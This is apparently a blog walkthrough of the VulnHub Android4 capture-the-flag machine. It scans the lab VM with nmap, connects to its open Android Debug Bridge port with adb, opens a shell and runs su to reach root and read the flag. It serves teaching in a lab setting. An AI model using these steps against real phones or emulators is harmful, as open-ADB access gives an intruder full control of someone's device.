Android4 Walkthrough
This is a very beginner Android challenge from vulnhub.
Download link: https://www.vulnhub.com/entry/android4-1,233/
Scan result
┌─[root@kali]─[~]
└──╼ # nmap -A -p 1-65535 192.168.43.54
Nmap scan report for android-25abe18209db8058 (192.168.43.54)
Host is up (0.00022s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
5555/tcp open freeciv?
8080/tcp open http PHP cli server 5.5 or later
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Deface by Good Hackers
22000/tcp open ssh Dropbear sshd 2014.66 (protocol 2.0)
| ssh-hostkey:
|_ 521 46:13:43:49:24:88:06:85:6c:75:93:73:b5:1d:8f:28 (ECDSA)
MAC Address: 08:00:27:B4:66:B5 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelTRACEROUTE
HOP RTT ADDRESS
1 0.22 ms android-25abe18209db8058 (192.168.43.54)
I started from the bottom and searched for Dropbear SSH exploits, but the version did not match. Then, I explored the web server on port 8080, but I couldn’t find anything interesting.
The only port left was 5555. I have enough Android background to know that this port is used by the ADB, which stands for Android Debug Bridge. Basically, it’s used to connect to Android phones and emulators and execute commands. After connecting to the device, we can use it to pop a shell.
You probably have to install the adb package and
connect to the device like this:
┌─[root@kali]─[~]
└──╼ # adb connect 192.168.43.54:5555
connected to 192.168.43.54:5555Now, we are successfully connected. Time to access the shell!
┌─[root@kali]─[~]
└──╼ # adb shell
3006(net_bw_stats)@x86:/ $ id
uid=2000(shell) gid=2000(shell) groups=1003(graphics),1004(input),1007(log),
1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),
3003(inet),3006(net_bw_stats)
uid=2000(shell) gid=2000(shell) groups=1003(graphics),1004(input),1007(log),
1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),
3003(inet),We want to be root since the flag is located in the /data/root/ directory. I simply typed su root and I was presented with a root shell.
3006(net_bw_stats)@x86:/ $ su root
uid=0(root) gid=0(root)@x86:/ # ls
acct
cache
config
d
data
default.prop
dev
etc
file_contexts
init
init.bluetooth.rc
init.environ.rc
init.rc
init.superuser.rc
init.trace.rc
init.usb.rc
init.x86.rc
lib08;#0e0e0e\
mnt
proc
property_contexts
sbin
sdcard
seapp_contexts
sepolicy
storage
sys
system
ueventd.android_x86.rc
ueventd.rc
vendor
x86.prop
2|uid=0(root) gid=0(root)@x86:/ # cd /data/root
uid=0(root) gid=0(root)@x86:/data/root # ls
flag.txtThere was no restriction and I could easily switch to the root user. The challenge is now completed and the final flag is:
ANDROID{u_GOT_root_buddy}
Before you go…
Thank you for taking the time to read my walkthrough. If you found it helpful, please hit the 👏 button 👏 (up to 50x) and share it to help others with similar interest find it! + Feedback is always welcome! 🙏
